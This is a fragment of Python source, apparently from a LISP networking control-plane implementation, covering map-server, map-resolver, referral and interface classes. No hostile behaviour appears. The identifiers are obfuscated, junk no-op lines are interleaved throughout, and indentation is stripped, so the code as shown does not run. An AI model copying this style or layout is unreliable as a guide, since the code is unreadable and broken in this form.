if 72 - 72: i11iIiiIii + o0oOOo0O0Ooo % ooOoO0o * I1ii11iIi11i . i1IIi
if 59 - 59: OoooooooOO - OoooooooOO - o0oOOo0O0Ooo + i1IIi % I1Ii111
def merge_rles_in_site_eid ( self ) :
if 74 - 74: IiII * iIii1I11I1II1 - I1IiiI
if 62 - 62: o0oOOo0O0Ooo
if 54 - 54: iIii1I11I1II1 / OoooooooOO + o0oOOo0O0Ooo . i1IIi - OoooooooOO
if 70 - 70: Ii1I / OoOoOO00 * Oo0Ooo
I1oo00O0 = { }
for iII in self . registered_rlocs :
if ( iII . rle == None ) : continue
for IIIi11i1 in iII . rle . rle_nodes :
oOOOo0o = IIIi11i1 . address . print_address_no_iid ( )
I1oo00O0 [ oOOOo0o ] = IIIi11i1 . address
if 5 - 5: OoooooooOO % I1ii11iIi11i - I1Ii111
break
if 28 - 28: OOooOOo
if 87 - 87: o0oOOo0O0Ooo - Ii1I + I11i
if 69 - 69: iII111i . Ii1I * OoOoOO00 / OoOoOO00 / OoOoOO00 + OoOoOO00
if 17 - 17: I1ii11iIi11i * OoOoOO00 + II111iiii
if 28 - 28: iIii1I11I1II1 % Oo0Ooo * I1Ii111 - IiII / OoO0O00 * OoooooooOO
self . merge_rlocs_in_site_eid ( )
if 88 - 88: O0
if 15 - 15: Oo0Ooo % I11i * O0
if 61 - 61: I1ii11iIi11i - ooOoO0o / OoOoOO00 % OOooOOo * i1IIi . IiII
if 27 - 27: I1ii11iIi11i % iII111i . Oo0Ooo * iIii1I11I1II1
if 40 - 40: I11i
if 58 - 58: o0oOOo0O0Ooo / OOooOOo . oO0o % ooOoO0o
if 33 - 33: I1IiiI * I1ii11iIi11i . OoO0O00 - I1Ii111 . OoO0O00
if 79 - 79: ooOoO0o
oo0OOo0Oo = [ ]
for iII in self . registered_rlocs :
if ( self . registered_rlocs . index ( iII ) == 0 ) :
oo0OOo0Oo . append ( iII )
continue
if 15 - 15: ooOoO0o + I1ii11iIi11i / I1IiiI - Oo0Ooo - Ii1I / I11i
if ( iII . rle == None ) : oo0OOo0Oo . append ( iII )
if 37 - 37: ooOoO0o / II111iiii . OOooOOo % iIii1I11I1II1 - Oo0Ooo - Ii1I
self . registered_rlocs = oo0OOo0Oo
if 47 - 47: I1ii11iIi11i
if 26 - 26: iII111i
if 55 - 55: I1ii11iIi11i . ooOoO0o * Oo0Ooo + I1Ii111
if 59 - 59: iII111i - OOooOOo - OoO0O00 . I1IiiI % o0oOOo0O0Ooo + iII111i
if 10 - 10: iIii1I11I1II1 - Ii1I
if 84 - 84: iII111i
if 21 - 21: i11iIiiIii
IIiiiI = lisp_rle ( "" )
iIi1i1I = { }
oOo = None
for i1iI11i in list ( self . individual_registrations . values ( ) ) :
if ( i1iI11i . registered == False ) : continue
iiI11Ii11iiI = i1iI11i . registered_rlocs [ 0 ] . rle
if ( iiI11Ii11iiI == None ) : continue
if 66 - 66: IiII
oOo = i1iI11i . registered_rlocs [ 0 ] . rloc_name
for oOo0o0 in iiI11Ii11iiI . rle_nodes :
oOOOo0o = oOo0o0 . address . print_address_no_iid ( )
if ( oOOOo0o in iIi1i1I ) : break
if 9 - 9: I1ii11iIi11i + OoooooooOO - OoooooooOO + OoO0O00 / iIii1I11I1II1
IIIi11i1 = lisp_rle_node ( )
IIIi11i1 . address . copy_address ( oOo0o0 . address )
IIIi11i1 . level = oOo0o0 . level
IIIi11i1 . rloc_name = oOo
IIiiiI . rle_nodes . append ( IIIi11i1 )
iIi1i1I [ oOOOo0o ] = oOo0o0 . address
if 23 - 23: iII111i / iIii1I11I1II1
if 5 - 5: O0
if 64 - 64: i1IIi * i1IIi . iII111i - O0 - oO0o % OoooooooOO
if 14 - 14: Ii1I % OoO0O00 % I1Ii111 * O0
if 8 - 8: I1IiiI - i11iIiiIii * I1IiiI
if 6 - 6: O0 - OoOoOO00 - i11iIiiIii / iII111i
if ( len ( IIiiiI . rle_nodes ) == 0 ) : IIiiiI = None
if ( len ( self . registered_rlocs ) != 0 ) :
self . registered_rlocs [ 0 ] . rle = IIiiiI
if ( oOo ) : self . registered_rlocs [ 0 ] . rloc_name = None
if 63 - 63: OOooOOo
if 84 - 84: i11iIiiIii * iIii1I11I1II1 % I11i % iII111i + OoooooooOO . o0oOOo0O0Ooo
if 78 - 78: o0oOOo0O0Ooo . iII111i + O0 / I1ii11iIi11i + I1ii11iIi11i + II111iiii
if 96 - 96: iIii1I11I1II1 * II111iiii . iIii1I11I1II1
if 13 - 13: Ii1I - OoOoOO00 . Ii1I
if ( list ( I1oo00O0 . keys ( ) ) == list ( iIi1i1I . keys ( ) ) ) : return ( False )
if 7 - 7: Ii1I - I11i / I1ii11iIi11i + iII111i
lprint ( "{} {} from {} to {}" . format ( green ( self . print_eid_tuple ( ) , False ) , bold ( "RLE change" , False ) ,
# ooOoO0o * I1IiiI % IiII
list ( I1oo00O0 . keys ( ) ) , list ( iIi1i1I . keys ( ) ) ) )
if 62 - 62: OoooooooOO . OoooooooOO / I11i % OoOoOO00
return ( True )
if 2 - 2: IiII % I1ii11iIi11i * OoO0O00 + Oo0Ooo * iII111i
if 85 - 85: OOooOOo * I1IiiI - iIii1I11I1II1 - OoOoOO00 + ooOoO0o . OoO0O00
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . add_cache ( self . eid , self )
else :
Ii111i1 = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( Ii111i1 == None ) :
Ii111i1 = lisp_site_eid ( self . site )
Ii111i1 . eid . copy_address ( self . group )
Ii111i1 . group . copy_address ( self . group )
lisp_sites_by_eid . add_cache ( self . group , Ii111i1 )
if 46 - 46: OoO0O00 * I1Ii111 . O0
if 86 - 86: i11iIiiIii . Ii1I / OoOoOO00 / I11i * i1IIi
if 40 - 40: o0oOOo0O0Ooo
if 33 - 33: i11iIiiIii + I1Ii111 % I1ii11iIi11i - I1Ii111 * OoO0O00
if 1 - 1: II111iiii / I1IiiI + II111iiii % II111iiii - I1Ii111
Ii111i1 . parent_for_more_specifics = self . parent_for_more_specifics
if 24 - 24: I11i / Oo0Ooo / i1IIi + IiII
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( Ii111i1 . group )
Ii111i1 . add_source_entry ( self )
if 10 - 10: I11i - IiII / II111iiii / oO0o % O0 / I1Ii111
if 91 - 91: oO0o * OoOoOO00 + O0 % Oo0Ooo
if 62 - 62: iIii1I11I1II1 - i11iIiiIii % iIii1I11I1II1 . ooOoO0o / OOooOOo * OoOoOO00
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . delete_cache ( self . eid )
else :
Ii111i1 = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( Ii111i1 == None ) : return
if 45 - 45: OOooOOo - OOooOOo % iII111i - IiII . O0
i1iI11i = Ii111i1 . lookup_source_cache ( self . eid , True )
if ( i1iI11i == None ) : return
if 6 - 6: iIii1I11I1II1 * II111iiii / O0 % IiII - I1Ii111
if ( Ii111i1 . source_cache == None ) : return
if 64 - 64: ooOoO0o
Ii111i1 . source_cache . delete_cache ( self . eid )
if ( Ii111i1 . source_cache . cache_size ( ) == 0 ) :
lisp_sites_by_eid . delete_cache ( self . group )
if 28 - 28: i11iIiiIii - IiII * I1ii11iIi11i + IiII * iII111i
if 75 - 75: o0oOOo0O0Ooo * OoOoOO00 % I1ii11iIi11i + OOooOOo . II111iiii
if 12 - 12: ooOoO0o
if 83 - 83: I1Ii111 % ooOoO0o + OoooooooOO
def add_source_entry ( self , source_se ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_se . eid , source_se )
if 50 - 50: i11iIiiIii % I1IiiI * iII111i / Ii1I
if 12 - 12: iII111i / OoO0O00 - II111iiii + Oo0Ooo
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 78 - 78: i1IIi
if 25 - 25: Ii1I * II111iiii / OoOoOO00
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
if 86 - 86: i1IIi + I1IiiI + I1Ii111 % II111iiii . IiII - iIii1I11I1II1
if 54 - 54: i11iIiiIii . Ii1I % I1IiiI . I1Ii111 . OoooooooOO
def eid_record_matches ( self , eid_record ) :
if ( self . eid . is_exact_match ( eid_record . eid ) == False ) : return ( False )
if ( eid_record . group . is_null ( ) ) : return ( True )
return ( eid_record . group . is_exact_match ( self . group ) )
if 49 - 49: OOooOOo % I11i - OOooOOo + Ii1I . I1ii11iIi11i + ooOoO0o
if 15 - 15: i11iIiiIii
def inherit_from_ams_parent ( self ) :
O0O0oO00 = self . parent_for_more_specifics
if ( O0O0oO00 == None ) : return
self . force_proxy_reply = O0O0oO00 . force_proxy_reply
self . force_nat_proxy_reply = O0O0oO00 . force_nat_proxy_reply
self . force_ttl = O0O0oO00 . force_ttl
self . pitr_proxy_reply_drop = O0O0oO00 . pitr_proxy_reply_drop
self . proxy_reply_action = O0O0oO00 . proxy_reply_action
self . echo_nonce_capable = O0O0oO00 . echo_nonce_capable
self . policy = O0O0oO00 . policy
self . require_signature = O0O0oO00 . require_signature
self . encrypt_json = O0O0oO00 . encrypt_json
if 85 - 85: I1Ii111 + iII111i - oO0o
if 59 - 59: IiII . oO0o / i11iIiiIii . I1Ii111
def rtrs_in_rloc_set ( self ) :
for iII in self . registered_rlocs :
if ( iII . is_rtr ( ) ) : return ( True )
if 64 - 64: OoOoOO00
return ( False )
if 20 - 20: OoOoOO00 / O0 * OOooOOo % I11i + OoO0O00 + o0oOOo0O0Ooo
if 51 - 51: Ii1I - OoOoOO00 / i11iIiiIii + O0
def is_rtr_in_rloc_set ( self , rtr_rloc ) :
for iII in self . registered_rlocs :
if ( iII . rloc . is_exact_match ( rtr_rloc ) == False ) : continue
if ( iII . is_rtr ( ) ) : return ( True )
if 71 - 71: ooOoO0o
return ( False )
if 35 - 35: OoOoOO00
if 55 - 55: iII111i - o0oOOo0O0Ooo + IiII * II111iiii
def is_rloc_in_rloc_set ( self , rloc ) :
for iII in self . registered_rlocs :
if ( iII . rle ) :
for IIiiiI in iII . rle . rle_nodes :
if ( IIiiiI . address . is_exact_match ( rloc ) ) : return ( True )
if 6 - 6: I1Ii111 / i1IIi / IiII . o0oOOo0O0Ooo
if 69 - 69: ooOoO0o - OoOoOO00 . I1IiiI . I11i + OoOoOO00 / i11iIiiIii
if ( iII . rloc . is_exact_match ( rloc ) ) : return ( True )
if 20 - 20: OoO0O00 . OoooooooOO - ooOoO0o . I11i / Oo0Ooo
return ( False )
if 89 - 89: iIii1I11I1II1 . ooOoO0o
if 82 - 82: OoOoOO00 - II111iiii . OoO0O00 * ooOoO0o
def do_rloc_sets_match ( self , prev_rloc_set ) :
if ( len ( self . registered_rlocs ) != len ( prev_rloc_set ) ) : return ( False )
if 78 - 78: OoOoOO00 % oO0o
for iII in prev_rloc_set :
ii1II1i1 = iII . rloc
if ( self . is_rloc_in_rloc_set ( ii1II1i1 ) == False ) : return ( False )
if 39 - 39: iIii1I11I1II1
return ( True )
if 72 - 72: II111iiii + I1Ii111 / Ii1I * iIii1I11I1II1
if 95 - 95: OoooooooOO + OOooOOo + II111iiii + IiII + OoO0O00
if 86 - 86: II111iiii / iII111i - I1ii11iIi11i
class lisp_mr ( object ) :
def __init__ ( self , addr_str , dns_name , mr_name ) :
self . mr_name = mr_name if ( mr_name != None ) else "all"
self . dns_name = dns_name
self . map_resolver = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( addr_str ) :
self . map_resolver . store_address ( addr_str )
self . insert_mr ( )
else :
self . resolve_dns_name ( )
if 65 - 65: I1ii11iIi11i + OoOoOO00
self . last_used = 0
self . last_reply = 0
self . last_nonce = 0
self . map_requests_sent = 0
self . neg_map_replies_received = 0
self . total_rtt = 0
if 43 - 43: O0 + I11i % II111iiii
if 56 - 56: IiII + Oo0Ooo . IiII % iIii1I11I1II1 % ooOoO0o % ooOoO0o
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
if 70 - 70: ooOoO0o / i1IIi - I11i - i11iIiiIii
try :
O00Oo = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
OO0oo0o0 = O00Oo [ 2 ]
except :
return
if 8 - 8: oO0o . OoO0O00 / IiII - oO0o / OoOoOO00 - i1IIi
if 48 - 48: OoooooooOO + II111iiii
if 46 - 46: I1IiiI - II111iiii * OoO0O00 % OoooooooOO / OoO0O00 + II111iiii
if 92 - 92: OoOoOO00 - iIii1I11I1II1
if 10 - 10: iII111i - I1IiiI / I1ii11iIi11i - i1IIi - II111iiii % i11iIiiIii
if 2 - 2: ooOoO0o % ooOoO0o
if ( len ( OO0oo0o0 ) <= self . a_record_index ) :
self . delete_mr ( )
return
if 94 - 94: ooOoO0o / OoooooooOO * i1IIi . Oo0Ooo * i11iIiiIii
if 5 - 5: iIii1I11I1II1 / oO0o - Oo0Ooo - I1IiiI + iIii1I11I1II1
oOOOo0o = OO0oo0o0 [ self . a_record_index ]
if ( oOOOo0o != self . map_resolver . print_address_no_iid ( ) ) :
self . delete_mr ( )
self . map_resolver . store_address ( oOOOo0o )
self . insert_mr ( )
if 63 - 63: iIii1I11I1II1 / ooOoO0o + O0 - o0oOOo0O0Ooo
if 31 - 31: Ii1I
if 76 - 76: OoO0O00 / II111iiii
if 92 - 92: o0oOOo0O0Ooo . i1IIi . OoOoOO00 / OoO0O00 % Ii1I
if 61 - 61: i1IIi / Ii1I . OoOoOO00 + i11iIiiIii
if 69 - 69: i11iIiiIii - iIii1I11I1II1
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
if 40 - 40: I1IiiI / oO0o + ooOoO0o
for oOOOo0o in OO0oo0o0 [ 1 : : ] :
OoOOOO = lisp_address ( LISP_AFI_NONE , oOOOo0o , 0 , 0 )
iii1i = lisp_get_map_resolver ( OoOOOO , None )
if ( iii1i != None and iii1i . a_record_index == OO0oo0o0 . index ( oOOOo0o ) ) :
continue
if 100 - 100: OoOoOO00 % iII111i * ooOoO0o . O0
iii1i = lisp_mr ( oOOOo0o , None , None )
iii1i . a_record_index = OO0oo0o0 . index ( oOOOo0o )
iii1i . dns_name = self . dns_name
iii1i . last_dns_resolve = lisp_get_timestamp ( )
if 37 - 37: I1ii11iIi11i
if 24 - 24: O0 . I1Ii111 * i11iIiiIii
if 84 - 84: ooOoO0o / I1ii11iIi11i - o0oOOo0O0Ooo . OoooooooOO * iIii1I11I1II1
if 16 - 16: I11i % O0
if 56 - 56: Ii1I * OoOoOO00 . i1IIi
iIi1II1IiI1I = [ ]
for iii1i in list ( lisp_map_resolvers_list . values ( ) ) :
if ( self . dns_name != iii1i . dns_name ) : continue
OoOOOO = iii1i . map_resolver . print_address_no_iid ( )
if ( OoOOOO in OO0oo0o0 ) : continue
iIi1II1IiI1I . append ( iii1i )
if 28 - 28: iII111i
for iii1i in iIi1II1IiI1I : iii1i . delete_mr ( )
if 18 - 18: I1Ii111
if 29 - 29: i1IIi - I1IiiI / i1IIi
def insert_mr ( self ) :
III11II111 = self . mr_name + self . map_resolver . print_address ( )
lisp_map_resolvers_list [ III11II111 ] = self
if 64 - 64: IiII
if 69 - 69: OOooOOo . I1IiiI
def delete_mr ( self ) :
III11II111 = self . mr_name + self . map_resolver . print_address ( )
if ( III11II111 not in lisp_map_resolvers_list ) : return
lisp_map_resolvers_list . pop ( III11II111 )
if 11 - 11: I1Ii111 * I1IiiI - I1Ii111 / iII111i
if 22 - 22: iII111i % I11i % O0 - I11i
if 71 - 71: I1Ii111 / II111iiii - OoooooooOO % i1IIi + OoOoOO00 % OoooooooOO
class lisp_ddt_root ( object ) :
def __init__ ( self ) :
self . root_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . public_key = ""
self . priority = 0
self . weight = 0
if 52 - 52: Ii1I . OoOoOO00 / o0oOOo0O0Ooo / iII111i
if 83 - 83: OoO0O00 - Oo0Ooo + I1Ii111 . I1IiiI
if 78 - 78: I11i / ooOoO0o . OoOoOO00 * i1IIi
class lisp_referral ( object ) :
def __init__ ( self ) :
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_set = { }
self . referral_type = LISP_DDT_ACTION_NULL
self . referral_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_ttl = 0
self . uptime = lisp_get_timestamp ( )
self . expires = 0
self . source_cache = None
if 15 - 15: i1IIi . II111iiii * OoOoOO00 / Oo0Ooo
if 99 - 99: iII111i - o0oOOo0O0Ooo / O0
def print_referral ( self , eid_indent , referral_indent ) :
oo0Ooo0o00OO = lisp_print_elapsed ( self . uptime )
ii1iIi = lisp_print_future ( self . expires )
lprint ( "{}Referral EID {}, uptime/expires {}/{}, {} referrals:" . format ( eid_indent , green ( self . eid . print_prefix ( ) , False ) , oo0Ooo0o00OO ,
# Ii1I * Oo0Ooo / oO0o / Ii1I
ii1iIi , len ( self . referral_set ) ) )
if 34 - 34: I1IiiI
for ooO00O0oOO in list ( self . referral_set . values ( ) ) :
ooO00O0oOO . print_ref_node ( referral_indent )
if 56 - 56: Ii1I
if 71 - 71: O0 / i1IIi
if 20 - 20: OOooOOo . iIii1I11I1II1 - I1Ii111 . i1IIi
def print_referral_type ( self ) :
if ( self . eid . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( "root" )
if ( self . referral_type == LISP_DDT_ACTION_NULL ) :
return ( "null-referral" )
if 82 - 82: oO0o * i11iIiiIii % o0oOOo0O0Ooo % IiII - I11i - OoO0O00
if ( self . referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND ) :
return ( "no-site-action" )
if 24 - 24: oO0o . II111iiii + OoO0O00 * I1ii11iIi11i / oO0o
if ( self . referral_type > LISP_DDT_ACTION_MAX ) :
return ( "invalid-action" )
if 86 - 86: I1Ii111 + I1ii11iIi11i
return ( lisp_map_referral_action_string [ self . referral_type ] )
if 63 - 63: ooOoO0o - i11iIiiIii . o0oOOo0O0Ooo - i1IIi - IiII
if 32 - 32: I1Ii111 / iIii1I11I1II1 + oO0o % I11i * OoooooooOO
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 69 - 69: OOooOOo
if 9 - 9: i11iIiiIii * Oo0Ooo
def print_ttl ( self ) :
O0O00O = self . referral_ttl
if ( O0O00O < 60 ) : return ( str ( O0O00O ) + " secs" )
if 33 - 33: oO0o / ooOoO0o
if ( ( O0O00O % 60 ) == 0 ) :
O0O00O = str ( old_div ( O0O00O , 60 ) ) + " mins"
else :
O0O00O = str ( O0O00O ) + " secs"
if 92 - 92: O0 . Oo0Ooo - Ii1I * I1IiiI * Oo0Ooo * iII111i
return ( O0O00O )
if 78 - 78: Ii1I * iIii1I11I1II1 - Ii1I - I1ii11iIi11i * I1ii11iIi11i
if 44 - 44: o0oOOo0O0Ooo
def is_referral_negative ( self ) :
return ( self . referral_type in ( LISP_DDT_ACTION_MS_NOT_REG , LISP_DDT_ACTION_DELEGATION_HOLE ,
# OoOoOO00
LISP_DDT_ACTION_NOT_AUTH ) )
if 20 - 20: i11iIiiIii
if 2 - 2: o0oOOo0O0Ooo % OOooOOo * O0 * OOooOOo
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . add_cache ( self . eid , self )
else :
iii1Ii = lisp_referral_cache . lookup_cache ( self . group , True )
if ( iii1Ii == None ) :
iii1Ii = lisp_referral ( )
iii1Ii . eid . copy_address ( self . group )
iii1Ii . group . copy_address ( self . group )
lisp_referral_cache . add_cache ( self . group , iii1Ii )
if 27 - 27: IiII . Oo0Ooo . I1ii11iIi11i
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( iii1Ii . group )
iii1Ii . add_source_entry ( self )
if 53 - 53: Ii1I / i11iIiiIii - I11i * OoooooooOO
if 88 - 88: OoO0O00 / Ii1I + ooOoO0o . iIii1I11I1II1 * ooOoO0o
if 56 - 56: o0oOOo0O0Ooo / iII111i . O0 % O0
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . delete_cache ( self . eid )
else :
iii1Ii = lisp_referral_cache . lookup_cache ( self . group , True )
if ( iii1Ii == None ) : return
if 37 - 37: I1Ii111
o000oOoO = iii1Ii . lookup_source_cache ( self . eid , True )
if ( o000oOoO == None ) : return
if 98 - 98: iII111i - OoOoOO00 / I1Ii111 . OOooOOo - OOooOOo - ooOoO0o
iii1Ii . source_cache . delete_cache ( self . eid )
if ( iii1Ii . source_cache . cache_size ( ) == 0 ) :
lisp_referral_cache . delete_cache ( self . group )
if 84 - 84: OOooOOo * ooOoO0o / O0
if 96 - 96: I11i . I11i % II111iiii
if 14 - 14: iII111i / OoooooooOO
if 8 - 8: OOooOOo + I1IiiI - Oo0Ooo + i1IIi . Ii1I . I1Ii111
def add_source_entry ( self , source_ref ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_ref . eid , source_ref )
if 38 - 38: I1IiiI / II111iiii * OoOoOO00 / I1Ii111
if 80 - 80: I1ii11iIi11i / ooOoO0o * ooOoO0o . Oo0Ooo
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 44 - 44: Ii1I * i1IIi % OoOoOO00 . OoOoOO00
if 16 - 16: Oo0Ooo / i1IIi / iIii1I11I1II1 / iIii1I11I1II1 % o0oOOo0O0Ooo / I1ii11iIi11i
if 11 - 11: I1IiiI
class lisp_referral_node ( object ) :
def __init__ ( self ) :
self . referral_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . priority = 0
self . weight = 0
self . updown = True
self . map_requests_sent = 0
self . no_responses = 0
self . uptime = lisp_get_timestamp ( )
if 45 - 45: OOooOOo / i1IIi * IiII * I1Ii111
if 34 - 34: ooOoO0o / iIii1I11I1II1 . iII111i
def print_ref_node ( self , indent ) :
i1 = lisp_print_elapsed ( self . uptime )
lprint ( "{}referral {}, uptime {}, {}, priority/weight: {}/{}" . format ( indent , red ( self . referral_address . print_address ( ) , False ) , i1 ,
# OoO0O00 . iIii1I11I1II1 . ooOoO0o - IiII . iII111i + Ii1I
"up" if self . updown else "down" , self . priority , self . weight ) )
if 76 - 76: Ii1I . oO0o . Oo0Ooo
if 13 - 13: iIii1I11I1II1 / o0oOOo0O0Ooo
if 24 - 24: I1Ii111 % OOooOOo * i1IIi - iIii1I11I1II1
class lisp_ms ( object ) :
def __init__ ( self , addr_str , dns_name , ms_name , alg_id , key_id , pw , pr ,
mr , rr , wmn , site_id , ekey_id , ekey ) :
self . ms_name = ms_name if ( ms_name != None ) else "all"
self . dns_name = dns_name
self . map_server = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( lisp_map_servers_list == { } ) :
self . xtr_id = lisp_get_control_nonce ( )
else :
self . xtr_id = list ( lisp_map_servers_list . values ( ) ) [ 0 ] . xtr_id
if 61 - 61: o0oOOo0O0Ooo + Ii1I
self . alg_id = alg_id
self . key_id = key_id
self . password = pw
self . proxy_reply = pr
self . merge_registrations = mr
self . refresh_registrations = rr
self . want_map_notify = wmn
self . site_id = site_id
self . map_registers_sent = 0
self . map_registers_multicast_sent = 0
self . map_notifies_received = 0
self . map_notify_acks_sent = 0
self . ekey_id = ekey_id
self . ekey = ekey
if ( addr_str ) :
self . map_server . store_address ( addr_str )
self . insert_ms ( )
else :
self . resolve_dns_name ( )
if 16 - 16: I11i - I11i + oO0o + iII111i . OoO0O00
if 96 - 96: iIii1I11I1II1 + iII111i + I1Ii111 % I1IiiI * OOooOOo
if 46 - 46: I1ii11iIi11i % Oo0Ooo * OOooOOo
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
if 64 - 64: I1ii11iIi11i
try :
O00Oo = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
OO0oo0o0 = O00Oo [ 2 ]
except :
return
if 17 - 17: II111iiii + Ii1I - o0oOOo0O0Ooo * II111iiii / Oo0Ooo / II111iiii
if 82 - 82: i11iIiiIii * OoOoOO00 . i1IIi + IiII * ooOoO0o
if 75 - 75: iIii1I11I1II1 / IiII / II111iiii . I11i
if 23 - 23: OOooOOo . ooOoO0o - iII111i % Ii1I . I1ii11iIi11i + IiII
if 81 - 81: I11i
if 5 - 5: OoooooooOO
if ( len ( OO0oo0o0 ) <= self . a_record_index ) :
self . delete_ms ( )
return
if 5 - 5: iII111i + oO0o % O0 . OoooooooOO + i1IIi
if 55 - 55: I1ii11iIi11i
oOOOo0o = OO0oo0o0 [ self . a_record_index ]
if ( oOOOo0o != self . map_server . print_address_no_iid ( ) ) :
self . delete_ms ( )
self . map_server . store_address ( oOOOo0o )
self . insert_ms ( )
if 34 - 34: OoO0O00 * iIii1I11I1II1 . iIii1I11I1II1
if 39 - 39: o0oOOo0O0Ooo
if 29 - 29: Oo0Ooo . Oo0Ooo * OoO0O00 % Ii1I - ooOoO0o
if 67 - 67: I1IiiI % O0 + I1IiiI * I1Ii111 * OoOoOO00 * II111iiii
if 79 - 79: I1IiiI
if 37 - 37: I1Ii111 + Ii1I
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
if 50 - 50: i11iIiiIii
for oOOOo0o in OO0oo0o0 [ 1 : : ] :
OoOOOO = lisp_address ( LISP_AFI_NONE , oOOOo0o , 0 , 0 )
OoOoO = lisp_get_map_server ( OoOOOO )
if ( OoOoO != None and OoOoO . a_record_index == OO0oo0o0 . index ( oOOOo0o ) ) :
continue
if 57 - 57: O0 * i1IIi - I1IiiI
OoOoO = copy . deepcopy ( self )
OoOoO . map_server . store_address ( oOOOo0o )
OoOoO . a_record_index = OO0oo0o0 . index ( oOOOo0o )
OoOoO . last_dns_resolve = lisp_get_timestamp ( )
OoOoO . insert_ms ( )
if 48 - 48: IiII / iIii1I11I1II1
if 20 - 20: oO0o / OoooooooOO
if 95 - 95: Oo0Ooo . i11iIiiIii
if 50 - 50: iII111i . i11iIiiIii - i1IIi
if 24 - 24: i11iIiiIii % iII111i . oO0o
iIi1II1IiI1I = [ ]
for OoOoO in list ( lisp_map_servers_list . values ( ) ) :
if ( self . dns_name != OoOoO . dns_name ) : continue
OoOOOO = OoOoO . map_server . print_address_no_iid ( )
if ( OoOOOO in OO0oo0o0 ) : continue
iIi1II1IiI1I . append ( OoOoO )
if 44 - 44: II111iiii - OoO0O00 + i11iIiiIii
for OoOoO in iIi1II1IiI1I : OoOoO . delete_ms ( )
if 34 - 34: I1ii11iIi11i % ooOoO0o / II111iiii * O0 % OOooOOo
if 9 - 9: I1ii11iIi11i / I1ii11iIi11i - OOooOOo . iIii1I11I1II1
def insert_ms ( self ) :
III11II111 = self . ms_name + self . map_server . print_address ( )
lisp_map_servers_list [ III11II111 ] = self
if 33 - 33: I1IiiI + oO0o % I1IiiI / iII111i - ooOoO0o - i11iIiiIii
if 39 - 39: i11iIiiIii / oO0o
def delete_ms ( self ) :
III11II111 = self . ms_name + self . map_server . print_address ( )
if ( III11II111 not in lisp_map_servers_list ) : return
lisp_map_servers_list . pop ( III11II111 )
if 71 - 71: I1Ii111 * iIii1I11I1II1 - I1Ii111
if 87 - 87: I1IiiI / Ii1I
if 54 - 54: OoooooooOO / Ii1I
class lisp_interface ( object ) :
def __init__ ( self , device ) :
self . interface_name = ""
self . device = device
self . instance_id = None
self . bridge_socket = None
self . raw_socket = None
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dynamic_eid_device = None
self . dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self . multi_tenant_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 26 - 26: o0oOOo0O0Ooo + OoO0O00
if 59 - 59: Ii1I * IiII
def add_interface ( self ) :
lisp_myinterfaces [ self . device ] = self
if 64 - 64: ooOoO0o . Oo0Ooo - OoOoOO00
if 66 - 66: OoOoOO00
def get_instance_id ( self ) :
return ( self . instance_id )
if 83 - 83: OOooOOo . IiII
if 98 - 98: i11iIiiIii
def get_socket ( self ) :
return ( self . raw_socket )
if 74 - 74: iIii1I11I1II1 * O0 + OOooOOo . o0oOOo0O0Ooo
if 17 - 17: I1Ii111
def get_bridge_socket ( self ) :
return ( self . bridge_socket )
if 59 - 59: OoOoOO00 . OoOoOO00 * iII111i - Ii1I . i11iIiiIii
if 68 - 68: iII111i
def does_dynamic_eid_match ( self , eid ) :
if ( self . dynamic_eid . is_null ( ) ) : return ( False )
return ( eid . is_more_specific ( self . dynamic_eid ) )
if 68 - 68: I1Ii111 - OoO0O00 % OoO0O00 % OOooOOo - OoO0O00
if 3 - 3: iIii1I11I1II1 + iIii1I11I1II1 + OoO0O00
def set_socket ( self , device ) :
I1iiIi111I = socket . socket ( socket . AF_INET , socket . SOCK_RAW , socket . IPPROTO_RAW )
I1iiIi111I . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
try :
I1iiIi111I . setsockopt ( socket . SOL_SOCKET , socket . SO_BINDTODEVICE , device )
except :
I1iiIi111I . close ( )
I1iiIi111I = None
if 59 - 59: iII111i
self . raw_socket = I1iiIi111I
